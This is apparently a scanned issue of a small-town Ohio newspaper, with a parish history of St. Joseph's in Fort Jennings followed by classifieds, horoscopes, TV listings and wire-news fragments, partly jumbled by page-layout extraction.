A summer migrant program was initiated by Father Miller in 1958. This was the first federally funded program of this kind in the nation. It provided an educational program for Mexican American children from 1958 to 1978. Sometimes there was also a fall session. Children were bused from migrant camps in Delphos, Kalida and Ottoville also. The school was taught by the Sisters and other volunteers at the grade school. In 1958 Pope Pius XII passed away and Pope John XXIII was elected to succeed him. The following year the Rev. Gerald M. Stein was assigned to Fort Jennings as the first assistant pastor. Father Miller was aging and needed help. The annual St. Joseph’s “Homecoming” on the 2nd Sunday of August is another of Father Miller’s accomplishments. This festival was held outside in tents on the church grounds. The big event continues to this day with delicious home-cooked meals. Activities keep changing with the times. During Father Miller’s pastorate our country got involved in 2 more wars. Young men had to march off to Korea in the 50s and Vietnam in the 60s and 70s. We are thankful they all returned alive. This was also the year the school district was told to remove crucifixes and other religious items from the school buildings because it was supported as a public school.
Father Stein arrived in time to be involved in the building of the new elementary school with its 14 classrooms and a multi-purpose room. It also had a kitchen and cafeteria. Father Stein was transferred in 1962, being replaced by Rev. John Hanacsek, a native of Czechoslovakia, who was ordained in Austria. On 25 March 1966 Father Hanacsek celebrated the first Mass in Fort Jennings in which the priest faced the people. Father Hanacsek helped many parishioners get tickets for the Papal Mass in New York City in 1965. Pope Paul VI was elected in 1963. Father Miller celebrated his Golden Jubilee on 21 November 1964 at the age of 80. Two years later the new Sisters’ Convent was built, facing First Street. Menke Bros. received the contract for $65,000.00. The Father Miller era ended in 1967, with his death on April 14th. He was buried in Toledo. He had served God and the community well. Father Hanacsek continued his duties until the new pastor, Father Stein, returned to Fort Jennings in June. He served as pastor for one year. Father Hanacsek later served as pastor of New Bavaria and North Creek.
The Rev. Herman J. Fortman came to the parish as pastor in 1968. He was a native of Kalida. One of his first projects was installing a replica of Michelangelo’s Pieta at the entrance of the cemetery. In 1969 Menke Bros. were given the contract for a new rectory, with building and furnishings costing $135,000. Father Fortman was often seen on the riding mower in the cemetery. Monsignor J. Fridolin Frommertz retired the same year Father Fortman came to Fort Jennings. Father Fortman invited the Monsignor to live with him and help with the parish. Father Frommertz assisted until his death in 1973. From his arrival until 1971, Father Fortman taught the high school religion classes once a week, during a common free period. In 1971 the parish began Thursday evening CCD classes for high school students. Lay persons helped with the teaching.
The Second Vatican Ecumenical Council of the Catholic Church was held from 1962-1965. The bishops attempted to come up with a plan for the church to survive in the modern world. Many of the profound changes were good but some were not so good. New altars were installed for the priest to face the congregation during Mass. Mass was celebrated in English instead of the traditional Latin. Saturday evening Masses were introduced to answer the Sunday Mass requirements. Parish councils were elected to act as advisors to the pastor and parishioners were asked to become more active in the church, which included being lectors and cantors. Carl Wieging became the first lector in the parish. Lay persons were now permitted to distribute Holy Communion as both bread and wine. Catholics could receive the Eucharist in the hand. All of these changes were accepted very well but then came the renovations of many Catholic churches. St. Joseph’s became a victim of this popular (or unpopular) project. The beautiful ornate wooden altars were removed, as were the pulpit and the Communion rail. The wood was said to be deteriorating. The Tabernacle was moved to the right side of the Sanctuary. Naturally a new paint job was in order, carpeting was installed and restrooms built in the basement.
In 1975 the first son of the parish was ordained to the priesthood. He was Dennis Ricker, son of Virgil and Angela (Rahrig) Ricker. He died at a young age in 1990, after serving in Texas and Ohio. The Blizzard of 1978 hit Fort Jennings and much of Ohio. Father Fortman said one Mass on Sunday but very few parishioners were able to brave the elements to get there. Father William Conces retired to Fort Jennings in 1979. He remained in the parish for 5 years. Father Fortman made plans to celebrate the 100th Anniversary of the building of the church but was transferred before the celebration. His request for a parish history was carried out in 1984.
Father John J. Shanahan, a native of Lima, was appointed pastor in July of 1983. He was a priestly man with a ready smile. He started the pre-baptismal program and the prenuptial counseling sessions. The last teaching Sisters retired in 1983, ending 70 years of teaching by the Sisters of St. Francis. Sister Norbertine Loshe remained in Fort Jennings for 5 years as coordinator of the religious education program. Sister Julie Grote made her home in Fort Jennings also. They both moved on in 1996 after Sister Norbertine celebrated the 60th Anniversary of her religious profession. Several young women from the parish have dedicated their life to Christ by entering the Sisters of St. Francis, Tiffin. They are: Sister Alma Ricker, Sister Carol Ann Pothast, Sister Edna Ricker, Sister Gemma Fenbert, Sister Mary Ann Lucke, Sister Virginia Fisher, Sister M. Euphrasia Wallenhorst, Sister T. Jane Schimmoeller, Sister Vincent DePaul Kohls and Sister Ruth Wieging. Sister Ruth later returned to the private life and married. The Centennial of the church building was held on 25 March 1984. After a Solemn Latin Mass the men of the parish served a dinner. It was attended by members of both St. Joseph’s parish and the St. John’s Lutheran members. The second son of the parish, Timothy Maag, was ordained a priest in 1992. In 1996 he took a leave of absence from his ministry. Father Michael Schelling, a Defiance native, was appointed the 19th pastor of St. Joseph’s. During his pastorate, in 1995, girl Mass servers were introduced. Alissa Hamond and Heather Kaverman had the privilege of being the first to serve for Father Schelling. Another fourth grader, Brianne VonLehmden, also joined the ranks, following training by Elvera Wieging. Parish organizations also changed. The Altar Rosary Society disbanded in 1996. The Sodality (for unmarried persons) and the St. Joseph’s Society also became inactive. The Catholic Ladies of Columbia remained very active. Read more in Wednesday’s Herald.
Interior in the Lutheran church.
Classifieds
Minimum Charge: 15 words, 2 times - $9.00
Each word is $.30 for 2-5 days; $.25 for 6-9 days; $.20 for 10+ days
Each word is $.10 for 3 months or more prepaid
010 Announcements
020 Notice
THE DELPHOS HERALD
Telling The Tri-County’s Story Since 1869
080 Help Wanted
CLASS A CDL Driver Needed. Class A CDL semi-truck driver needed for various routes. Candidates must be 21, have 2 years’ experience, valid Class A CDL driver’s license, clean driving record. Hours: Mon-Fri 7am-4pm. K&M Tire 965 Spencerville Road, PO Box 279 Delphos, OH 45833. ATTN: Rachel Mitchell RachelM@kmtire.com Fax: 419-879-4372
LPNS NEEDED for homecare in Lima area for 3rd shift. HHA/STNAs needed in Lima, Wapak, Van Wert and Delphos areas. Daytime and evening hours available. Apply at Interim HealthCare 3745 Shawnee Rd., Lima or call 419-228-2535
OTR SEMI DRIVER NEEDED Benefits: Vacation, Holiday pay, 401k. Home weekends & most nights. Call Ulm’s Inc. 419-692-3951
PART-TIME RURAL Route Driver needed. Hours vary, Monday-Saturday. Valid driver’s license and reliable transportation with insurance required. Applications available at The Delphos Herald office 405 N. Main St., Delphos.
PAT’S DONUTS and Kreme Hiring 2nd shift 1pm-9pm Part-time and Full time. Drug screen contingent upon hiring. Send Resume/apply at 662 Elida Ave., Delphos
DRIVERS-REGIONAL: HOME Weekly! Great Benefits! 4wks Vacation. $.40/mile. CDL-A, Recent OTR Exp req’d. Dave: 937-726-3994 or 800-497-2100
SPHERION - SPECIAL Recruiting Event August 27-31. Door Prizes, Refreshments. Wear your favorite team’s colors & be entered into drawing for $50 gift card. Apply online: Select: Industrial - Lima search. For more info: 419-227-0113
290 Wanted to Buy
IS YOUR AD HERE?
Call today 419-695-0015
Deadlines: 11:30 a.m. for the next day’s issue. Saturday’s paper is 11:00 a.m. Friday Monday’s paper is 1:00 p.m. Friday Herald Extra is 11 a.m. Thursday
005 Lost & Found
We accept
ENROLL TODAY
LOST DOG -Area of SR-66 and Carpenter Rd. Small brown terrier mix. Family Pet. 419-234-2252
Raines Jewelry
Scrap Gold, Gold Jewelry, Silver coins, Silverware, Pocket Watches, Diamonds.
We Have:
Cash for Gold
2330 Shawnee Rd. Lima (419) 229-2899
• Grass Seed • Top Soil • Fertilizer • Straw
Classifieds Sell
ACCEPTING CHILDREN 3-5
ON STATE RT. 309 - ELIDA 419-339-6800
VIEW PICTURES AND DETAILS
JIMLANGHALSREALTY.COM Since 1980 419-692-9652
integrity • professionalism • service
Kreative Learning Preschool
040 Services
LAMP REPAIR - Table or floor. Come to our store.
340 W. Fifth St. Delphos, OH 45833 419-695-5934
Hohenbrink TV. 419-695-1229
340 Garage Sales
MULTI-FAMILY GARAGE Sale. 1245 S. Erie St. 8/24, 9am-4pm. 8/25, 9am-1pm. Infant-adult clothing, scrubs, school supplies, bedding, jewelry, canning jars, furniture, plants, trees, & misc.
7000 Defiance Trail
4 bdrm. 3 ½ bath home on 7.26 acres, just east of Delphos. Included with property: 3 rental homes, 2 ponds, wooded area, garden and great scenery, very unique, rentals could pay entire mortgage!
3 or 4 bedrm. brick home, 3 acre lot, outbuilding with liv. quarters, a must to see!!
Exceptional 4 bedrm., 2 bath home, modern kitch. with hardwood floor, Florida rm., den, basement, very spacious, immediate possession!
8375 Redd Rd.
425 N. Clay St.
Shop Herald Classifieds for Great Deals
DRIVERS; LOCAL. Home Daily. New pay package and excellent benefits. Average 2000mi/week. CDL-A 1yr experience required. 419-232-3969
at Vancrest Health Care Center
We need you...
ABSOLUTE PUBLIC AUCTION
6:00 PM – Tuesday – Aug 28 – 6:00 PM LOCATION: 103 N. Main Middle Point, OH
NEW LISTING
409 S. Clay St. Delphos
Priced for quick sale!
1 1/2 STORY HOME - GARAGE
Could easily be the mother of bargains for this year’s home auctions; square, straight modest sized older home needing some help but with major monies spent; 3 beds, up/down; modern bath, large rear utility houses the high efficiency furnace w/air; modern 200 AMP breaker box; kitchen w/ newer oak cupboards, and living room w/hardwood; covered rear patio and small wooden front deck; detached two car; the bargains are REALLY in the small communities – we’ll guess this home will EASILY pay for itself as a rental in 3 to 5 years . . . . or an inexpensive owner occupied; price range of a good used automobile . . . . . SELLS to the highest bidder that evening; TERMS: $1,000 deposit w/balance in 30 days; warranty deed awarded w/ taxes prorated and possession upon closing; ATTORNEY for the heirs, Mr. Scott Gordon, Van Wert, OH; showing – your convenience - STRALEYREALTY.COM
SELLERS: HEIRS OF RUTH A. MIHN AUCTIONEERS: William C. Straley; Chester M. Straley; Philip Fleming, App
HIRING DRIVERS with 5+ years OTR experience! Our drivers average 42cents per mile & higher! Home every weekend! $55,000-$60,000 annually. Benefits available. 99% no touch freight! We will treat you with respect! PLEASE CALL 419-222-1630
Vancrest of Delphos is a long-term care facility providing skilled rehabilitation services, assisted living, post acute medical care and more. We are looking for caring, outgoing, energetic, skilled STNA’s to join our team. Full time and part time positions are available, for all shifts. Visit us at Vancrest for details and application information.
STNAs
501 Misc. for Sale
FOR SALE: Pioneer Stereo Surround System w/five speakers, CD Player, Double Cassette Deck, Virtual Dolby Surround, with 100W 4ch Equal Power Amp. Paid $1000 new asking $250. Phone: 419-236-8642
530 Farm Produce
Kings Elida Grown Blackberries
419-339-1968
Cindy Alexander 419-234-7208
AlexanderRealtyServices.Net
OPEN HOUSE
9am-5pm Fri., Sat. & Sun.
19176 Venedocia-Eastern Rd., Venedocia
Beautiful country 4 bedroom, 1 1/2 bath, oversized 2 car garage. Updated everywhere. Must See! $89,900. Approx. monthly payment - $482.60
Vancrest of Delphos
1425 E. Fifth St. Delphos, OH 45833
SCHRADER REALTY LLC
“Put your dreams in our hands”
Office: 419-692-2249 Fax: 419-692-2205 202 N. Washington Street Delphos, OH 45833
Krista Schrader ................ 419-233-3737 Ruth Baldauf-Liebrecht ... 419-234-5202 Jodi Moenter ................ 419-296-9561 Amie Nungester ............... 419-236-0688 Stephanie Clemons...... 419-234-0940 Janet Kroeger .................. 419-236-7894 Judy M.W. Bosch ......... 419-230-1983
Advertise Your Business
DAILY
For a low, low price!
Call for Pricing Sold by pints
SWEET CORN, tomatoes, peaches, mums available at Gessner’s Produce. 1mile North of Delphos, Rt. 66. Ph.419-692-5749
OPEN HOUSES
1:30-2:30p.m. 615 Cass St., Delphos
SUNDAY, AUG. 26, 2012
CLARK Real Estate
OPEN HOUSES
1:00-2:30 p.m.
483 S. Franklin St. 907 E. Third St. 480 N. Main Street
SUNDAY, AUG. 26
419-695-1006 419-204-7238 419-234-2254 419-204-7238
Dick
FIRST TIME OPEN! 3BR, 2BA ranch on dead end street, 2 car garage, 3 city lots. Jodi will greet you
821 E. Cleveland St., Delphos
Delphos $99,900 Jack Adams Delphos $83,000 Chuck Peters Ft. Jennings $89,000 Elaine Wehri Delphos $84,000 Chuck Peters
550 Pets & Supplies
FREE REX Rabbit, male. 2 years old. Call 419-968-2860.
CLARK Real Estate
EVERYTHING WE TOUCH TURNS TO SOLD
“The Key To Buying Or Selling”
3:00-4:00p.m. 11959 Converse Roselm Rd., Delphos 411 E. Third St., Delphos
Dick
FIRST TIME OPEN! Ranch with 3 bedroom, attached garage, large yard. Krista will greet you.
3:00-4:30 p.m.
436 East 9th Street
Don’t make a move without us!
Custom built 4BR, 3BA, over 3300 sq ft, 1.5 acre, 2 car garage plus additional garage, Delphos schools. Krista will greet you. 3 Bedroom-2 bath homeclose to schools and churches, only $50’s Janet will greet you.
FOR A FULL LIST OF HOMES FOR SALE & OPEN HOUSES:
View all our listings at dickclarkrealestate.com
675 W. Market St., Suite 120, Lima, OH 312 N. Main St. Delphos, OH Phone: 419-879-1006 Phone: 419-695-1006
• Pet Food • Pet Supplies • Purina Feeds
940 E. FIFTH ST., DELPHOS
419-692-7773 Fax 419-692-7775
419-339-6800
On S.R. 309 in Elida
BY APPOINTMENT
$49,900-Van Wert SD NEW LISTING! Cape Cod home with 2BR/1BA with approx 1700 sq ft living space on .84 acre lot. Enclosed porch, outbuilding. (47) Allison Sickles 567-204-3889 3BR/1BTH ranch on 1 acre lot. Approx 1336 sq ft. 2 car attached garage. Above ground pool. (167) Kathy Mathews 419-233-3786 $58,900-Spencerville SD Price Reduced Vinyl two-story home with 4 bedrooms, 1 full bath and 2 half baths, approx. 2826 sq. ft., 2 car detached garage, handicap accessible entry. (141) Mike Reindel 419-2353607 $14,500-Spencerville SD Building Lot .460 acre lot located in Spencer Township. (115) Mike Reindel 419-235-3607 $38,000-Spencerville SD Commercial Building One story commercial building with approx. 1548 sq. ft., .085 acre lot, currently a flower shop. (114) Mike Reindel 419-235-3607
419-692-SOLD 419-453-2281
Under $45,000
218 Mahoning, Cloverdale: House, Garage, Huge Lot. Asking $29,000. Call Tony. Ottoville SD Lots: Next to school. Call Tony OPEN SATURDAY 1:00-3:00 Kalida Golf Course: 2 Avail. Tony: 233-7911. 19183 SR 697, Delphos: 3 BR Country Ranch on 1+ acre. Garage. Call Del Kemper: 204-3500. 126 / 128 Church St., Ottoville: Big brick beauty. Currently a duplex showing good return. Could be restored to single family. Huge garage. Call Tony: 233-7911. New Listing!!!: 18824 Rd 20P, Ft. Jennings: 3 BR, 2 Bath, Country Ranch on basement. Updated inside and out. Call Tony: 233-7911. 337 Walnut, Ottoville: REDUCED! 3 BR, 2 Bath, Updated throughout. Fish Pond, Garage & Stg Bldg. Owners re-locating. Tony: 233-7911 609 Broad, Kalida: 3 BR, 2 Bath on scenic 4+ acre lot. Garden Shed and much more. Tony. New Listing! 202 S. 4th Kalida: 4 BR, completely updated in and out. Huge garage. Corner lot. Call Tony: 233-7911:
560 Lawn & Garden
HUSKEE RIDING Lawn Mower. 20HP 50inch cut. Needs new starter. $200 OBO. Call 419-230-1029
590 House For Rent
2 BEDROOM, 1Bath house available soon. No pets. Call 419-692-3951
$45,000-$75,000
902 Spencerville Rd, Delphos: REDUCED!!! 3 BR, 1 Bath, 2 Car Garage, Vinyl Siding. Lynn: 234-2314. 311 W. 5th, Delphos: 3 BR, 1 Bath. Affordable Living!!! $55K Tony: 233-7911.
600 Apts. for Rent
1BR APT for rent, appliances, electric heat, laundry room, No pets. $425/month, plus deposit, water included. 320 N. Jefferson. 419-852-0833. FOR RENT or rent to own. 2 Bdrm, 2 bath double wide located in Southside community in Delphos. Call 419-692-3951. FORT JENNINGS- Quiet secure 1 & 2 bedroom in an upscale apartment complex. Massage therapist on-site. Laundry facilities, socializing area, garden plots. Cleaning and assistance available. Appliances and utilities included. $675-775/mo. 419-233-3430 LARGE UPSTAIRS Apartment, downtown Delphos. 233-1/2 N. Main. 4BR, Kitchen, 2BA, Dining area, large rec/living room. $650/mo. Utilities not included. Contact Bruce 419-236-6616
$76,000-$100,000
S
950 Car Care
535 N. Washington, Delphos: 3 BR, Many updates including new roof, driveway, windows. $89K. Call Del Kemper: 204-3500. REDUCED 466 Dewey, Delphos: Excellent Ranch home with new windows, heat pump, & Central A/C. Call Gary: 692-1910. 828 N. Main, Delphos: 4 BR, Newer shingles. Nice interior. Owner wants offer. Tony: 233-7911. OPEN SUNDAY 12:00-1:00 101 Auglaize, Ottoville: 5/6 BR, 3 bath home with countless updates. Ton of home for the money. Call Tony: 233-7911. $101,000-$150,000
Or send qualifications by mail to: AAP St. Marys Corporation 1100 McKinley Road St. Marys, Ohio 45885 Attention: Human Resource-DH
SERVICE DIRECTORY
Amish Crew
Needing work
Roofing • Remodeling Bathrooms • Kitchens Hog Barns • Drywall Additions • Sidewalks Concrete • etc. FREE ESTIMATES
ervice
220 Maple Lane, Ft. Jennings: Impeccable 3 BR Brick Ranch on Full Basement. Call Tony for more details on this exclusive listing: 233-7911.
…for color photos and full descriptions of all of these fine properties. Then, call the agent listed to arrange a viewing of your new home!!!
AT YOUR
GO TO: Lawn Care
Geise
Transmission, Inc.
• automatic transmission • standard transmission • differentials • transfer case • brakes & tune up
2 miles north of Ottoville
SPEARS
LAWN CARE
Total Lawncare & Snow Removal
22 Years Experience • Insured
COMMUNITY SELF-STORAGE
GREAT RATES NEWER FACILITY
810 Parts/Acc.
Auto Repairs/
Midwest Ohio Auto Parts Specialist
Windshields Installed, New Lights, Grills, Fenders,Mirrors, Hoods, Radiators 4893 Dixie Hwy, Lima
419-733-9601
POHLMAN POURED
CONCRETE WALLS
Residential & Commercial • Agricultural Needs • All Concrete Work
Commercial & Residential
419-692-0032
Across from Arby’s
419-453-3620
950 Construction
Tim Andrews
MASONRY RESTORATION
•LAWN MOWING• •FERTILIZATION• •WEED CONTROL PROGRAMS• •LAWN AERATION• •SPRING CLEANUP• •MULCHING & MULCH DELIVERY• •SHRUB INSTALLATION, TRIMMING & REMOVAL•
Lindell Spears
950 Tree Service
1-800-589-6830
TEMAN’S
OUR TREE SERVICE
• Trimming • Topping • Thinning • Deadwooding Stump, Shrub & Tree Removal Since 1973
840 Mobile Homes
RENT OR Rent to Own. 2 bedroom, 1 bath mobile home. 419-692-3951.
419-695-8516
check us out at
920 Merchandise
Free & Low Price
Mark Pohlman
Chimney Repair
419-339-9084 cell 419-233-9460
419-692-7261
Bill Teman 419-302-2981 Ernie Teman 419-230-4890
419-204-4563
950 Miscellaneous
POHLMAN BUILDERS
ROOM ADDITIONS
GARAGES • SIDING • ROOFING BACKHOE & DUMP TRUCK SERVICE FREE ESTIMATES FULLY INSURED
2 TWIN size bedspreads, pastel floral design. In good condition, $20 each. Call 419-692-7264.
Advertise Your Business
SAFE & SOUND
SELF-STORAGE
Security Fence •Pass Code •Lighted Lot •Affordable •2 Locations
Why settle for less?
L.L.C.
Place A Help Wanted Ad
In the Classifieds The Daily Herald
DAILY
For a low, low price!
DELPHOS
• Trimming & Removal • Stump Grinding • 24 Hour Service • Fully Insured
Send qualifications by mail to: AAP St. Marys Corporation 1100 McKinley Road St. Marys, Ohio 45885 Attention: Human Resource-CG
Call
Mark Pohlman
419-339-9084 cell 419-233-9460
KEVIN M. MOORE
419-692-6336
(419) 235-8051
419 695-0015
10 - The Herald
Saturday, August 25, 2012
Tomorrow’s Horoscope
By Bernice Bede Osol
SUNDAY, AUGUST 26, 2012 New people will be entering your life in the year ahead and could become extremely important in some of your affairs. One or more of them might have a positive influence in furthering your ambitions. VIRGO (Aug. 23-Sept. 22) -When trying to promote something important, use a soft sell rather than a hard pitch. Your audience will be able to better visualize what you say when you paint some verbal pictures. LIBRA (Sept. 23-Oct. 23) -Because you’re equally as intuitive as you are logical, your business instincts could be better than usual. With this combination working on your behalf, it should spell big profit. SCORPIO (Oct. 24-Nov. 22) -You won’t have to do anything out of the ordinary to attract attention. You won’t go unnoticed, regardless of the size of the crowd or type of people in attendance. SAGITTARIUS (Nov. 23-Dec. 21) -- Should you get involved in something of a confidential nature, make sure that you don’t mention your plans to people who are not key players. There’s no reason to involve outsiders. CAPRICORN (Dec. 22-Jan. 19) -- Sometimes, people come to us for advice but don’t really listen to anything we have to say. This won’t be true in your case -- your reputation will command respect and deference. AQUARIUS (Jan. 20-Feb. 19) -Many of your best ideas will involve ways to further your ambitions and add to your resources. This might encourage you to aim for many different kinds of targets. PISCES (Feb. 20-March 20) -- You’re likely to make an indelible impression on others, not because of any heroic deed, but because of all the little acts of thoughtfulness you display. ARIES (March 21-April 19) -Although you might not be invited to participate in a friend’s undertaking, you can create your own venture and perhaps have even more fun. Do your own thing. TAURUS (April 20-May 20) -Do what you want to do in concert with others, rather than going it alone. 
Not only will things be easier to pull off, you’ll also have a lot more laughs and joy being with others. GEMINI (May 21-June 20) -- When your artistic and creative attributes start vying for attention, find some time to respond to them. Chances are you’ll produce something of beauty that’ll last a lifetime. CANCER (June 21-July 22) -- You’ll feel more satisfied if you select activities that require both mental and physical agility. Better yet, engage in games that stimulate competition. LEO (July 23-Aug. 22) -- Owing to the good auspices of others, your possibilities for gain look exceptionally promising. You’ll do especially well getting involved with persons who have generous natures. MONDAY, AUGUST 27, 2012 Several significant successes are likely to be in the offing for you in the year ahead. Onlookers might view your objectives as unduly complicated, but you’ll see them as simple, because they’ll be labors of love. VIRGO (Aug. 23-Sept. 22) -Insincerity will be instantly detected and result in you being labeled a shallow person. If you can’t honestly find something worth praising in another, there’s something wrong with you. LIBRA (Sept. 23-Oct. 23) -Thinking big doesn’t mean a thing unless you put your words into action. The only way you can achieve noteworthy successes is to earn them through effort and application. SCORPIO (Oct. 24-Nov. 22) -- Instead of viewing matters realistically, you’re likely to color facts to suit your expectations. Self-deception will result in huge disappointments. SAGITTARIUS (Nov. 23-Dec. 21) -- Even though it might be hard to convince you otherwise, the world doesn’t owe you any free rides. You shouldn’t expect anything more than what you deserve. CAPRICORN (Dec. 22-Jan. 19) -- Be mindful of your behavior, or else it will be far too easy for you to be overly attentive to someone who doesn’t deserve it while totally ignoring someone who does. AQUARIUS (Jan. 20-Feb.
19) -- A commitment you make might be of little importance to you but quite significant to the person to whom you’re making it. Be sure to honor your word. PISCES (Feb. 20-March 20) -- Pretending to be something other than what you are will be detected by your friends and will make a poor impression on them. The world will love you more if you are your own sweet self. ARIES (March 21-April 19) -- Do not be too disappointed if someone whom you’re very fond of does not live up to your expectations. Leave him or her some room to be human -- no one is perfect all the time. TAURUS (April 20-May 20) -- Stop and think before you open your mouth, or you could experience one of those embarrassing moments when you say the wrong thing, at the wrong time, to the wrong person. GEMINI (May 21-June 20) -- Thinking you have to be a big spender in order to impress someone is barking up the wrong tree. If you have to drop a lot of dough to get someone’s attention, then he or she isn’t anybody you want to know. CANCER (June 21-July 22) -- When it comes to one-on-one relationships, treat everyone as an equal and forgo all forms of brinksmanship. If you try to put on any airs or affectations, someone will trump you. LEO (July 23-Aug. 22) -- Unless you keep pace with your obligations and duties, you are likely to sweep certain obligations under the rug. If you do, you’ll pay a hefty price later on.
HI AND LOIS
BLONDIE
BEETLE BAILEY
SNUFFY SMITH
HAGAR THE HORRIBLE
Saturday Evening
WPTA/ABC NASCAR Racing WHIO/CBS NFL Football WOHL/FOX Cops ION Psych A&E AMC
8:00
8:30
9:00
9:30
10:00
10:30
WLIO/NBC America's Got Talent
Cops
Cable Channels
WrestleMania 28 Mobbed Psych
Law & Order: SVU Local Psych Barter Barter
Local Local Local Touch Psych
11:00
11:30
August 25, 2012
12:00 12:30
Saturday Night Live 30S Psych Storage Tanked
Local Storage
Storage Storage Barter Barter Tombstone ANIM My Cat From Hell Tanked BET All About Coming to America BRAVO Ocean's Eleven CMT Smokey-Bndt. 2 Redneck Vacation CNN America to Work Piers Morgan Tonight COMEDY Blades of Glory DISC Moonshiners Moonshiners DISN Jessie Austin Phineas Phineas E! Julie & Julia ESPN High School Football ESPN2 WNBA Basketball ESPN All-Access FAM The Notebook FOOD Restaurant Stakeout Restaurant Stakeout FX Wanted HGTV Love It or List It Love It or List It
Barter Barter Tombstone Tanked Tanked Roll Bounce O Brother, Where Art Redneck Island Redneck Vacation CNN Newsroom America to Work Youth in Revolt Yukon Men Moonshiners Good Luck Good Luck Vampire Vampire Fashion Police Baseball Tonight SportsCenter High School Football Time Traveler Restaurant Stakeout Iron Chef America Anger Wilfred Biased Hunters Hunt Intl Hunters Hunt Intl
BORN LOSER
Redneck Island Piers Morgan Tonight Tosh.0 Tosh.0 Yukon Men Austin Austin The Soup Chelsea SportsCenter Restaurant Stakeout Louie Wilfred Love It or List It
Premium Channels
HBO MAX SHOW
Pawn Pawn Fatal Honeymoon MTV Teen Mom Teen Mom NICK Victoriou Victoriou SCI Thirteen Ghosts SPIKE Walking Tall TBS Big Bang Big Bang TCM The Razor's Edge TLC 20/20 on TLC TNT Sherlock Holmes TOON Catch That Kid TRAV Ghost Adventures TV LAND Griffith Griffith USA NCIS VH1 100 Greatest Artists WGN MLB Baseball
HIST LIFE
Pawn
Pawn Pawn Pawn Pawn Pawn Pawn Officer Murder Fatal Honeymoon Teen Mom Teen Mom Teen Mom Awkward. Victoriou Victoriou Yes, Dear Yes, Dear Friends Friends Friends Haunted High House of Bones The Transporter 2 Crank: High Voltage The Wedding Date Mean Girls Jesse James 20/20 on TLC 20/20 on TLC 20/20 on TLC 20/20 on TLC National Treasure Home Mov. King/Hill King/Hill Fam. Guy Dynamite Boondocks Bleach Samurai 7 Ghost Adventures Ghost Adventures Ghost Adventures Ghost Adventures King King King King King King King King NCIS NCIS White Collar Land of the Lost Hard Rock Calling A Few Good Men WGN News at Nine Funniest Home Videos Chris Chris 24/7 Road 2 Days
Pawn
FRANK & ERNEST
Sunday Evening
8:00
Very Harold & Kumar 3D True Blood Very Harold & Kumar 3D Aliens Strike Back Tower Heist The Rock Katt Williams Larry Wilmore's
©2009 Hometown Content, listings by Zap2it
WLIO/NBC NFL Football WOHL/FOX Simpsons Simpsons
WPTA/ABC Once Upon a Time WHIO/CBS Big Brother
8:30
Extreme Makeover The Good Wife
9:00
9:30
10:00
The Mentalist
10:30
Cable Channels
A&E AMC
ION
Flashpoint
Fam. Guy Fam. Guy Local Flashpoint Leverage
Local Local Local
11:00
11:30
August 26, 2012
12:00 12:30
Dateline NBC Leverage
Weeds
Episodes
BIG NATE
Leverage
Storage Storage Storage Storage Storage Storage Storage Storage Storage Storage Joe Kidd Hell on Wheels Breaking Bad Town Breaking Bad Hell on ANIM Off Hook Off Hook Wildman Wildman Wildman Wildman Off Hook Off Hook Wildman Wildman BET Sunday Best Sunday Best Sunday Best Together Together Paid Inspir. BRAVO Housewives/NJ Housewives/NJ Housewives/NJ Below Housewives/NJ TBA CMT Redneck Redneck Island Redneck Island Redneck Island Redneck Island Redneck CNN Count CNN Newsroom CNN Presents Piers Morgan Tonight COMEDY Without Jeff Dunham: Controlled Chaos Tosh.0 Futurama The Burn South Pk Jeff Dunham DISC Survivorman Ten Days One Car Too Far Bering Sea G. One Car Too Far Bering Sea G. DISN Good Luck Gravity ANT Farm Jessie Phineas Phineas Shake It Shake It Vampire Vampire E! Kardashian Kardashian Jonas Kardashian Jonas Kardashian ESPN MLB Baseball SportsCenter SportCtr ESPN2 Softball MLS Soccer NHRA Drag Racing Football First FAM Aladdin Aladdin J. Osteen Ed Young FOOD Cupcake Wars Food Truck Race Iron Chef America Chopped Food Truck Race FX Taken Taken Surrogates HGTV Property Brothers Holmes Inspection Handyman Holmes Inspection Holmes Inspection
GRIZZWELLS
Premium Channels
HBO SHOW MAX
American Pickers Fatal Honeymoon MTV Ridic. The Inbet NICK My Wife My Wife SCI Raidrs-Lost Ark SPIKE Bar Rescue TBS Valentine's Day TCM Ball of Fire TLC Hoard-Buried TNT Sherlock Holmes TOON Annoying Regular TRAV Man v Fd Man v Fd TV LAND M*A*S*H M*A*S*H USA Law & Order: SVU VH1 Love, Hip Hop WGN How I Met How I Met
HIST LIFE
Ice Road Truckers Drop Dead Diva Ridic. Ridic. Nick News George Indiana Jones Bar Rescue
Ice Road Truckers Shark Wranglers Army Wives Fatal Honeymoon Jackass: Number Two Yes, Dear Yes, Dear Friends Friends Flip Men
American Pickers Jackass: Number Two Friends Friends Blade Runner Bar Rescue Friendly Persuasion High School Moms The Great Escape Aqua The Eric Meat Meat King King Law & Order: SVU Mama Drama Monk The Newsroom
Flip Men Bar Rescue Valentine's Day Man of the West Hoard-Buried High School Moms Hoard-Buried Leverage The Great Escape Leverage Venture King/Hill King/Hill Fam. Guy Fam. Guy Dynamite Meat Meat Big Beef Paradise Steak Paradise King King King King King King Law & Order: SVU Law & Order: SVU Burn Notice Big Ang Big Ang Hollywood Exes Big Ang Big Ang How I Met How I Met News/Nine Replay The Unit True Blood Homeland The Newsroom Tower Heist Weeds Episodes True Blood Weeds Episodes
PICKLES
Very Harld 3D The Birdcage Dexter
©2009 Hometown Content, listings by Zap2it
Episodes
Web Ther.
Gunman killed outside Empire State Mexican Navy: Police fired on US gov’t vehicle Building likely didn’t have time to fire
NEW surveillance video shows Johnson pointing his weapon at police, but it’s likely he did not get a chance, who neighbors had seen leave his apartment in a suit every day since he was laid off a year ago, had worked for six years for
Saturday, August 25, 2012
The Herald — 11
MEXICO CITY (AP) — Mex. Another official said they were in stable condition. The U.S. Embassy had not released details of the shooting or the names of the victims nearly 12 hours later. The Navy said in a written statement that federal police shot the U.S. vehicle, but its description of the incident left out key details of how the shooting occurred. It said at least four vehicles opened fire on the Americans’ sport utility vehicle on a road south of Mexico City, but did not make clear if any of the four carried federal police officers. A U.S. official who was briefed on the shooting said, however, that all the shots were fired by federal police, of which at least 12 officers were being held for questioning by Mexican authorities. The U.S. Embassy employees were on their way to do training or related work at a nearby military base, the official said. The Navy said the embassy personnel were heading down a dirt road to the military installation when a carload of gunmen opened fire on them and chased them and a Navy officer accompanying them. The shooting broke out in an area that has been used by common criminals, drug gangs and leftist rebels in the past..
PR guru: More Harry material may emerge Syrian regime airstrikes kill 21 in eastern city
LONDON (AP) —old while abroad.
